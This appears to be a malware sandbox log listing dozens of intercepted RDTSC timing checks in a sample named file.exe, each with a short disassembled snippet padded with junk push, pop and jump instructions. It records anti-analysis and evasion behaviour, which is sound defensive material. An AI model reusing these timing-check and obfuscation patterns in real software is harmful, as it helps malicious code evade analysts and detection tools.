Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B07CA3 second address: B07CE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 pop eax 0x00000008 jmp 00007F10E0E4A42Dh 0x0000000d pop ecx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 ja 00007F10E0E4A443h 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B07CE2 second address: B07CE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B07CE9 second address: B07D00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F10E0E4A433h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB4ED3 second address: BB4EF0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10E0B669CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007F10E0B669C6h 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB5045 second address: BB504B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB504B second address: BB5051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB5051 second address: BB5055 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BBDE81 second address: BBDEBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F10E0B669D5h 0x00000009 jmp 00007F10E0B669CAh 0x0000000e popad 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 jp 00007F10E0B669C8h 0x00000018 pushad 0x00000019 popad 0x0000001a jng 00007F10E0B669CEh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BBC01F second address: BBC023 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BBC023 second address: BBC027 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BBCBC6 second address: BBCBD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BBCE5D second address: BBCE61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BBD67A second address: BBD67E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC3A75 second address: BC3A7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC3A7D second address: BC3A83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC3A83 second address: BC3A88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC3A88 second address: BC3A8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC7D8F second address: BC7D99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F10E0B669C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC70AC second address: BC70B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC71B7 second address: BC71DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F10E0B669D5h 0x00000009 jnl 00007F10E0B669C6h 0x0000000f popad 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC7605 second address: BC7625 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F10E0E4A432h 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007F10E0E4A426h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC7625 second address: BC7629 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC7629 second address: BC7641 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F10E0E4A426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F10E0E4A42Ah 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC7641 second address: BC7645 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC77B5 second address: BC77B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC7907 second address: BC792B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10E0B669D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jp 00007F10E0B669C6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC792B second address: BC792F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BC792F second address: BC7935 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCE318 second address: BCE341 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F10E0E4A438h 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007F10E0E4A432h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCE341 second address: BCE347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCE347 second address: BCE35A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F10E0E4A42Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCEBBC second address: BCEBC6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCED04 second address: BCED0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCEFD9 second address: BCF00B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F10E0B669D2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F10E0B669D5h 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BCF00B second address: BCF010 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD59B0 second address: BD59BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F10E0B669C6h 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD59BE second address: BD59E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 jg 00007F10E0E4A426h 0x0000000c pop ebx 0x0000000d pop edi 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F10E0E4A438h 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD59E9 second address: BD59ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1BF6A second address: B1BF6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1BF6E second address: B1BF92 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10E0B669CCh 0x00000007 jmp 00007F10E0B669D0h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1BF92 second address: B1BFAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F10E0E4A435h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1BFAB second address: B1BFC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10E0B669D9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1BFC8 second address: B1BFCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1BFCE second address: B1BFD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD8DC1 second address: BD8DC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD8DC7 second address: BD8DCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BE8CDA second address: BE8CF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F10E0E4A42Dh 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BEBA50 second address: BEBA76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F10E0B669C6h 0x0000000a jnl 00007F10E0B669C6h 0x00000010 popad 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F10E0B669CFh 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BEBA76 second address: BEBA7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BEBA7B second address: BEBA82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BEB460 second address: BEB468 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BEB5EB second address: BEB60B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10E0B669CCh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jl 00007F10E0B669C6h 0x00000014 pushad 0x00000015 popad 0x00000016 push esi 0x00000017 pop esi 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BEB60B second address: BEB610 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFA7A9 second address: BFA7B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFA7B4 second address: BFA7B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFA7B8 second address: BFA7C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B16E07 second address: B16E0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFEB21 second address: BFEB45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10E0B669D0h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push esi 0x0000000d pop esi 0x0000000e pop eax 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pushad 0x00000014 popad 0x00000015 pop esi 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFEB45 second address: BFEB4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BFEB4A second address: BFEB61 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F10E0B669CAh 0x00000008 jl 00007F10E0B669C6h 0x0000000e pop edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C00374 second address: C0037A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C06EB6 second address: C06EC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007F10E0B669C6h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C06EC7 second address: C06ED5 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F10E0E4A426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C072CA second address: C072D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F10E0B669C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C072D4 second address: C072EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10E0E4A42Dh 0x00000007 jg 00007F10E0E4A426h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C072EB second address: C07305 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10E0B669D4h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C07305 second address: C07309 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C256C6 second address: C256CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2557A second address: C25589 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10E0E4A42Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C25589 second address: C2558E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C283BF second address: C283DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F10E0E4A437h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C283DA second address: C28407 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10E0B669D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a pushad 0x0000000b jmp 00007F10E0B669D4h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C28407 second address: C2843F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F10E0E4A435h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F10E0E4A436h 0x00000011 ja 00007F10E0E4A426h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2A276 second address: C2A27A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2A3CB second address: C2A3CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2A3CF second address: C2A3E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F10E0B669D4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2A3E9 second address: C2A412 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F10E0E4A434h 0x00000008 jng 00007F10E0E4A426h 0x0000000e pop edx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push esi 0x00000012 jne 00007F10E0E4A440h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C40D13 second address: C40D3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F10E0B669CAh 0x0000000b popad 0x0000000c jmp 00007F10E0B669D1h 0x00000011 pop esi 0x00000012 pushad 0x00000013 pushad 0x00000014 push edx 0x00000015 pop edx 0x00000016 push esi 0x00000017 pop esi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C40D3E second address: C40D61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007F10E0E4A442h 0x0000000b jmp 00007F10E0E4A436h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C40EB2 second address: C40EB7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C411B5 second address: C411CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F10E0E4A42Ch 0x0000000d push edx 0x0000000e pop edx 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C41499 second address: C4149F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4149F second address: C414A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C414A5 second address: C414C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F10E0B669D2h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C414C1 second address: C414C7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C41937 second address: C41941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C448E6 second address: C448F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F10E0E4A426h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C44975 second address: C4497C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4497C second address: C449BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 jbe 00007F10E0E4A42Ah 0x0000000e mov dx, F782h 0x00000012 sub dword ptr [ebp+122D1A92h], edx 0x00000018 push 00000004h 0x0000001a mov dword ptr [ebp+122D2ED3h], eax 0x00000020 call 00007F10E0E4A429h 0x00000025 push eax 0x00000026 push edx 0x00000027 jng 00007F10E0E4A437h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C449BE second address: C449DB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007F10E0B669D2h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C449DB second address: C449E5 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F10E0E4A42Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C449E5 second address: C449FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b push edi 0x0000000c jno 00007F10E0B669C6h 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C449FC second address: C44A00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C44A00 second address: C44A23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10E0B669CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d jne 00007F10E0B669C8h 0x00000013 push eax 0x00000014 push edx 0x00000015 jg 00007F10E0B669C6h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C44A23 second address: C44A5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10E0E4A437h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 jmp 00007F10E0E4A437h 0x00000016 pop esi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C44C3B second address: C44C9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jne 00007F10E0B669D2h 0x00000011 jo 00007F10E0B669CCh 0x00000017 jnp 00007F10E0B669C6h 0x0000001d nop 0x0000001e call 00007F10E0B669D9h 0x00000023 stc 0x00000024 pop edx 0x00000025 or dword ptr [ebp+122D3349h], esi 0x0000002b push dword ptr [ebp+12453850h] 0x00000031 mov edx, dword ptr [ebp+12452776h] 0x00000037 push 3FA45ADCh 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F10E0B669D2h 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C47F35 second address: C47F39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C47F39 second address: C47F4F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F10E0B669C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F10E0B669CCh 0x0000000f rdtsc
